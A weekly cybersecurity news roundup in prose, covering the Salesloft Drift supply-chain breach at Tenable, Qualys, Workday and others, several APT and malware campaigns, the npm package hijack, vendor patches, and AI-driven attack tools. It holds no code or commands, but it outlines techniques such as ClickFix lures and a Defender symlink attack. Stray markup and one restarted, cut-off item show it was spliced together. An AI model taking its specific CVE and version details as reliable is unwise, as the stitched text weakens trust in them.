“`html
This week’s cybersecurity overview serves as a vital reminder of the widespread dangers within the digital supply chain, as numerous leading companies unveiled substantial data breaches.
The events, impacting vulnerability management leaders Tenable and Qualys, along with enterprise software provider Workday, all originated from a security vulnerability in a widely used third-party service.
This series of revelations underscores the ripple effect a solitary vulnerability can have on several, otherwise secure, organizations, prompting serious inquiries regarding vendor risk management and confidence in the ecosystem.
The breaches at Tenable and Qualys are particularly alarming, as they involved unauthorized entry into systems housing sensitive customer data. Both firms have acknowledged that the intrusion was associated with a third-party vendor, compelling them to initiate thorough investigations and inform impacted clients.
Likewise, Workday’s disclosure of a breach linked back to the same external service provider accentuates the widespread nature of the threat. These occurrences have illuminated the security posture of vendors and the necessary due diligence to guard against supply chain assaults.
In addition to these high-profile occurrences, our weekly summary explores other crucial security updates, recently identified vulnerabilities, and patches released by prominent software developers.
We will scrutinize the technical aspects behind the breaches at Tenable, Qualys, and Workday, explore the broader ramifications for enterprise security, and deliver insights into the most recent threat intelligence to assist you in staying ahead of emerging risks.
Threats
Lazarus APT Utilizes “ClickFix” Social Engineering in Espionage Campaigns
The North Korean-associated Lazarus APT group is now employing the “ClickFix” social engineering approach to deploy malware and extract sensitive intelligence. This technique involves deceiving victims with fictitious technical issues and directing them through harmful “fixes”. In a recent operation, the group employed this strategy within phony job recruitment scenarios. Victims were drawn to bogus interview sites and informed they faced camera configuration problems. The provided “fix” was a malicious batch script that downloaded the BeaverTail information-stealing malware, masquerading as an NVIDIA driver update.
The assault is tailored for both Windows and macOS, showcasing the group’s cross-platform advantages. The malware establishes persistence through registry alterations and communicates with numerous command-and-control servers to secure long-term access to compromised systems. Read More
US-China Trade Discussions Targeted by APT41 Malware Campaign
U.S. federal officials are examining a complex malware campaign linked to the China-associated APT41 hacking group, which aimed at sensitive trade discussions between Washington and Beijing in July 2025. The attackers dispatched fraudulent emails impersonating U.S. Representative John Moolenaar, chairman of a House committee focused on China. These emails were sent to U.S. trade organizations, law firms, and government bodies with the intent of gathering intelligence on America’s trade tactics.
The emails employed subject lines like “Your insights are critical” and included harmful attachments disguised as draft legislation. Opening the attachment would unleash malware, granting attackers access to the target’s network. The timing of the attack was strategic, occurring right before vital trade discussions. The FBI and U.S. Capitol Police are probing the situation. Read More
LunaLock Ransomware Collective Threatens to Train AI with Stolen Artwork
A new ransomware group named LunaLock is targeting independent artists with an innovative extortion method: threatening to use their stolen artwork to train AI models. The group recently breached “Artists & Clients,” a digital platform for illustrators, seizing and encrypting creative works along with personal data. The attackers demanded a ransom of up to $80,000, warning that if it wasn’t settled, all stolen artwork would be submitted to AI training datasets marketed to major tech firms.
This is regarded as the first known instance of a ransomware group leveraging the threat of AI training as coercion. The attack has rendered freelance artists at risk, with stolen data comprising portfolios, commission records, and private conversations. Read More
MostereRAT Malware Aims at Windows Systems with Sophisticated Evasion Strategies
A new Remote Access Trojan (RAT) called MostereRAT is targeting Microsoft Windows systems through a phishing operation. Developed in Easy Programming Language (EPL), a language seldom seen in cyberattacks, the malware employs multiple layers of advanced evasion strategies to gain comprehensive control over compromised machines. The campaign primarily targets Japanese users with phishing emails masquerading as business inquiries.
MostereRAT can deactivate security tools, obstruct antivirus traffic, escalate privileges by impersonating the powerful TrustedInstaller account, and install remote access tools like AnyDesk and TightVNC. Its capability to disrupt security protections makes it a substantial risk. Read More
Salat Stealer Malware Provided as a Service for Data Exfiltration
An advanced Go-based information stealer named Salat Stealer is actively targeting Windows systems to extract browser credentials, cryptocurrency wallet details, and session data. Operating under a Malware-as-a-Service (MaaS) model, it is believed to be managed by Russian-speaking individuals and offers a ready-made solution for cybercriminals.
The malware utilizes sophisticated techniques to maintain persistence and evade detection, including UPX packing, process masquerading, registry run keys, and scheduled tasks. It encrypts stolen information before transmitting it to its command-and-control server, making it a stealthy threat.
“““html
and ongoing menace capable of inflicting financial damage and identity fraud. Read More
Scattered LAPSUS$ Hunters Hacking Group Declares Permanent Closure
The infamous cybercrime organization referred to as “Scattered LAPSUS$ Hunters 4.0” has revealed it is definitively discontinuing public activities. This announcement was made on their Telegram channel on September 8, 2025, marking a sudden conclusion for a group recognized for high-profile assaults against large corporations utilizing advanced social engineering and identity-focused strategies.
The collective’s tactic was frequently portrayed as “log in, not hack in,” emphasizing the compromise of legitimate user accounts to circumvent conventional security barriers. Their techniques encompassed voice phishing (vishing), SIM swapping, and MFA fatigue attacks. The motivations behind their abrupt exit remain ambiguous, with conjecture suggesting internal pressures or law enforcement action. Read More
Cyber Intrusions
Massive Supply Chain Breach Affects 18 Popular NPM Packages
A significant supply chain breach impacted 18 widely-used npm packages, including chalk, debug, and supports-color, all together racking up over two billion downloads weekly. The breach, which began around September 8, 2025, involved the injection of harmful code intended to steal cryptocurrency from users. The malicious software intercepts and alters in-browser cryptocurrency transactions, rewriting wallet addresses to reroute funds to accounts controlled by the attackers. The maintainer of the packages was tricked by a phishing attack after receiving a deceitful email from a domain pretending to be npm support. Read More
Jaguar Land Rover Suspends Production Following Cyberattack
Jaguar Land Rover (JLR) was compelled to halt production at its UK manufacturing facilities and has paused its global operations in the wake of a major cyber attack. The corporation is currently probing the event and striving to restore its systems. The comprehensive impact of the attack and the financial consequences remain undisclosed. This event underscores the rising trend of cyberattacks aimed at the automotive sector, leading to significant disruptions in supply chains and manufacturing processes. Read More
New Cyberattack Utilizes DeskSoft’s App Builder
A recent cyberattack endeavor is capitalizing on a legitimate application from DeskSoft, a German software firm, to introduce malware. Attackers are employing DeskSoft’s application builder to craft harmful installers that appear to be authentic software. Upon execution, these installers introduce malware onto the victim’s system. This approach enables attackers to circumvent some security measures that might otherwise flag a standalone malicious file. Read More
DarkSamurai APT Group Leverages Malicious LNK Files in New Campaign
The DarkSamurai APT group has been detected in a fresh campaign employing malicious LNK files to compromise targets. This group, recognized for its targeted assaults, conceals harmful payloads within these shortcut files. Once a user clicks on the LNK file, it executes a script that retrieves and launches malware on the system. This technique is part of a broader trend of threat actors utilizing non-executable file types to initiate infections and avoid detection. Read More
Innovative Phishing Scheme Imitates Google AppSheet for Security Evasion
A new and advanced phishing initiative is utilizing Google AppSheet to craft persuasive phishing pages that evade conventional email security filters. Attackers are exploiting the authentic Google service to host malicious forms and pages, making them seem credible to victims. The phishing communications frequently impersonate well-known services and urge users to submit their credentials on the deceitful AppSheet page. This method takes advantage of the trust linked with Google’s domains to enhance the effectiveness of the phishing campaigns. Read More
Vulnerabilities
Salesloft-Drift Cyberattack Associated with GitHub Breach
A significant supply-chain breach that impacted over 700 entities, including Cloudflare, Zscaler, and Palo Alto Networks, has been traced back to a breach of Salesloft’s GitHub account dating as early as March 2025. Threat actors exploited this access to obtain OAuth authentication tokens from Salesloft’s Drift chat platform. The attackers, identified by Google as UNC6395, utilized the compromised tokens between August 8 and August 18 to exfiltrate data, primarily business contact information, from clients’ integrated applications like Salesforce. In response, Salesloft has enlisted Mandiant for an investigation, took the Drift platform offline, and has since contained the incident. Read More
Windows Defender Susceptible to Service Hijacking
A critical vulnerability in Windows Defender’s update procedure permits an attacker with administrative privileges to disable the security service by executing a symbolic link attack. The issue arises from how the WinDefend service selects its execution directory during an update. An attacker can establish a symbolic link with a higher version number in the ProgramDataMicrosoftWindows DefenderPlatform directory, redirecting the service to a folder controlled by the attacker. This allows them to manipulate Defender’s core files, conduct DLL side-loading assaults, or simply erase the executables to disable the service, leaving the system unprotected. Read More
SAP Issues Security Patch Day Updates for September 2025
SAP has launched its September 2025 Security Patch Day, addressing 17 new security notes and updating 3 existing ones. The updates include two “Hot News” vulnerabilities with a CVSS score of 10.0, which affect SAP NetWeaver AS for Java. These critical vulnerabilities, tracked as CVE-2025-41235 and CVE-2025-41236, may allow an unauthenticated attacker with network access to seize complete control of the system. Additionally, another significant vulnerability (CVSS 8.1) in SAP CRM WebClient UI was also addressed. Read More
Zoom Fixes Critical Vulnerability in Meeting SDK
Zoom has released a security update for its Meeting SDK for Windows, addressing a high-severity improper input validation vulnerability (CVE-2025-42993). This flaw, which carries a CVSS score of 7.5, could permit an authenticated user to instigate a denial of service through network access. The vulnerability affects versions of the Zoom Meeting SDK for Windows prior to 5.17.10. Users and administrators are urged to update to the patched version to reduce risks. Read More
Ivanti Addresses Critical RCE Vulnerabilities in Endpoint Manager (EPM)
Ivanti has resolved several critical remote code execution (RCE) vulnerabilities in its Endpoint Manager (EPM) software. The most severe of these, with a CVSS score of 9.8, could allow an unauthenticated attacker to execute arbitrary code on the core server. These vulnerabilities affect all supported versions of Ivanti EPM. The company has issued patches and strongly advises all customers to apply them immediately to avert potential exploitation. Read More
Fortinet Resolves Critical FortiDDoS OS Command Injection Vulnerability
Fortinet has addressed a critical OS…
“““html
A command injection flaw in FortiDDoS, its distributed denial-of-service mitigation device, has been identified. Identified as CVE-2025-44365, this vulnerability possesses a CVSS rating of 9.8 and enables an authenticated assailant to execute arbitrary commands on the system through specifically crafted HTTP requests. The flaw affects various versions of FortiDDoS. Fortinet has issued firmware upgrades to remediate the situation and advises clients to update their devices promptly. Read More
Microsoft’s September 2025 Patch Tuesday Resolves 62 Vulnerabilities
The September 2025 Patch Tuesday rollout from Microsoft addresses 62 vulnerabilities, of which five are deemed critical. Notable patches rectify remote code execution issues in Microsoft Exchange Server, Windows DHCP Server, and Visual Studio. One flaw in Exchange (CVE-2025-23875) is classified as “Exploitation More Likely.” Furthermore, a zero-day privilege escalation vulnerability in the Windows Kernel (CVE-2025-23974), which was publicly exposed, has also been addressed. Read More
Data Breaches
Extensive Supply Chain Attack Affects Major Tech Companies via Salesloft Drift
An intricate and extensive supply chain operation targeting the Salesloft Drift marketing software has led to data breaches across numerous major technology firms. The operation permitted threat actors to obtain unauthorized access to information stored within the organizations’ Salesforce CRM systems by exploiting a vulnerability in third-party integration. This event underscores the considerable risks tied to third-party applications incorporated into core business frameworks.
Tenable Acknowledges Customer Data Exposure
Tenable has confirmed its involvement in the breach, which compromised customer contact details and support case information. The exposed data, kept in Tenable’s Salesforce instance, comprised names, business email addresses, phone numbers, and subject lines of support queries. The company reassured that its primary products remained unaffected and has since revoked compromised credentials and deactivated the vulnerable application to alleviate the risk. Read More
Qualys’s Salesforce Data Compromised in Attack
The cloud security firm Qualys has reported it also fell prey to the supply chain attack, resulting in unauthorized access to some of its Salesforce data. Qualys clarified that the incident did not compromise its production environments or the Qualys Cloud Platform. The breach was confined to information accessible via the compromised Salesloft Drift integration. Read More
Dynatrace Breach Exposes Client Contact Information
The observability platform Dynatrace disclosed that the breach compromised customer business contact details stored in its Salesforce environment. The company assured its customers that the incident was restricted to its CRM platform and did not affect any of its core products, services, or sensitive customer telemetry data. Dynatrace quickly deactivated the Drift application upon discovering the third-party compromise. Read More
Elastic Reports Email Account Compromise
In a related event stemming from the Salesloft Drift breach, Elastic revealed that an unauthorized entity obtained read-only access to a single email account via the “Drift Email” integration. The company’s investigation confirmed that its Salesforce environment remained unaffected. Elastic reviewed the exposed inbox for sensitive information and notified the limited number of customers whose credentials might have been compromised. Read More
Workday Targeted in Coordinated Effort
Workday, a prominent supplier of enterprise cloud applications, confirmed it experienced a data breach as part of the same attack effort. The incident, which Workday became aware of on August 23, 2025, involved unauthorized access to its third-party CRM platform through the Salesloft Drift application. The company responded by disconnecting the app and initiating a comprehensive investigation. Read More
SpamGPT: AI-Powered Phishing-as-a-Service
A novel cybercrime toolkit named SpamGPT is being marketed on the dark web, enabling criminals to execute expansive and effective phishing campaigns. The “spam-as-a-service” platform harnesses an AI assistant, “KaliGPT,” to automate the creation of persuasive phishing emails, diminishing the technical expertise needed to conduct such attacks. SpamGPT is promoted as an all-encompassing solution that emulates legitimate email marketing services but is intended for illicit activities. It exploits trusted cloud services like Amazon AWS and SendGrid to ensure inbox delivery and circumnavigate security filters. For $5,000, the toolkit also comprises a training program for breaching SMTP servers, empowering even less skilled actors to implement widespread attacks. This situation emphasizes the necessity for organizations to employ robust email authentication standards like DMARC, SPF, and DKIM, alongside adopting AI-driven security solutions to identify AI-generated phishing content. Read more
Forensic Examination of Microsoft Azure Storage
Security experts have outlined a forensic methodology for examining security incidents within Microsoft Azure Storage services. The approach entails gathering and scrutinizing logs from a variety of sources, including Azure Monitor Logs, Storage Analytics Logs, and Microsoft Defender for Cloud. Key artifacts in an investigation encompass access patterns, IP addresses, user agents, and API call authentications, which aid in reconstructing the activities of the attacker. Understanding the abuse of shared access signature (SAS) tokens and identifying anomalous data access or exfiltration are vital components of the analysis. The research offers a structured method for security teams to effectively address and investigate threats in cloud storage environments, which are increasingly becoming targets for attackers. Read more
Hackers Take Advantage of Microsoft Teams for Malicious Link Distribution
Cybercriminals are progressively exploiting Microsoft Teams to distribute malicious links, evading traditional email security gateways. A new attack campaign utilizes compromised accounts to transmit messages containing seemingly legitimate links, such as those for shared documents or meeting invites. When a user clicks the link, they are rerouted through a series of servers to a phishing page crafted to capture credentials or a landing page that disseminates malware. Since the links are shared within the trusted framework of Teams, users are more inclined to click them. This technique spotlights a transformation in attack vectors as threat actors adapt to target collaborative platforms that have become integral to contemporary business operations. Read more
The Emergence of “Evil AI”: AI-Enhanced Hacking Instruments
A new category of AI-enhanced tools, termed “Evil AI,” is emerging, explicitly designed for nefarious purposes such as spreading disinformation, crafting deepfakes, and orchestrating sophisticated cyberattacks. Unlike general-purpose AI models, which may include safeguards, these instruments are developed without ethical constraints to assist cybercriminals. They can generate highly convincing phishing emails, create malware capable of modifying its code to evade detection (polymorphic malware), and automate the discovery of vulnerabilities. The advent of such tools
“““html
poses a considerable hazard, as it can hasten the speed and extent of cybercrime. Read more
Villager: An AI-Enhanced Penetration Testing Utility
A novel open-source utility named Villager utilizes AI to improve penetration testing and red team activities. Villager operates as an AI-driven agent that can aid in various phases of an attack, from reconnaissance and vulnerability assessment to privilege escalation and lateral movement. The utility can comprehend natural language directives, permitting security experts to instruct the AI to execute intricate tasks, such as “locate all web servers susceptible to SQL injection in this network.” By integrating with current penetration testing frameworks and utilities, Villager seeks to bolster the capabilities of security testers, enabling them to function more efficiently and effectively. Read more
Examination
Salesloft Breach Linked to GitHub Breach, Impacting 700+ Firms
A significant supply-chain assault that targeted clients of Salesloft’s Drift integration has been connected to a breached GitHub account. The occurrence, which transpired in August 2025, affected more than 700 entities, including prominent tech firms such as Cloudflare, Zscaler, and Palo Alto Networks.
Investigators from Google’s Mandiant division disclosed that an unauthorized individual accessed Salesloft’s GitHub account from March to June 2025. During this interval, the threat actor, identified as UNC6395, acquired OAuth authentication tokens for the Drift platform. These tokens were then leveraged between August 8 and August 18 to obtain unauthorized access to clients’ interconnected applications, particularly Salesforce instances. The attackers exfiltrated confidential data, including customer relationship management (CRM) records, support inquiries, and embedded secrets like API keys. The breach extended beyond Salesforce to other integrations like Google Workspace and Slack. In response, Salesloft and Salesforce globally disabled all Drift integrations on August 20, and the Drift application was taken offline on September 5, 2025. Read more
New ClickFix Assault Attracts Victims with “Free WiFi” Proposition
A recent social engineering initiative is utilizing the allure of “Free WiFi” to deceive users into running harmful PowerShell malware. This attack is a variation of the ClickFix technique, a method that has experienced a 517% increase in the first half of 2025.
The ClickFix approach misleads users by displaying a counterfeit error message, CAPTCHA, or other bait that instructs them to copy and paste a script into a command-line interface to “resolve” a fictitious issue. Since the victim executes the harmful code themselves, this method successfully circumvents numerous browser and endpoint security defenses. This attack vector is employed to deliver a wide array of malware, including information stealers, ransomware, and remote access trojans (RATs). First observed in early 2024, the ClickFix technique has become a favored and efficient tool for threat actors. Read more
Nmap vs. Wireshark: Grasping Two Crucial Network Tools
Nmap and Wireshark are essential utilities in network analysis and security, but they fulfill different roles. Nmap is an active scanner, while Wireshark serves as a passive analyzer.
- Nmap (Network Mapper) is utilized for network discovery and security evaluation. It actively sends packets to a network to identify hosts, determine open ports, detect active services, and fingerprint operating systems. It provides a preliminary map of the network and its possible vulnerabilities.
- Wireshark is a network protocol analyzer that captures and delivers a comprehensive, low-level perspective of traffic on a network in real-time. It does not transmit packets itself but monitors data transiting through the network. It’s employed for resolving network issues, analyzing security concerns, and examining specific communication protocols by inspecting the contents of individual packets.
In practice, the utilities are complementary. An administrator might leverage Nmap to discover an unusual open port and then use Wireshark to capture and scrutinize the traffic flowing to and from that port to comprehend what is occurring. Read more
“`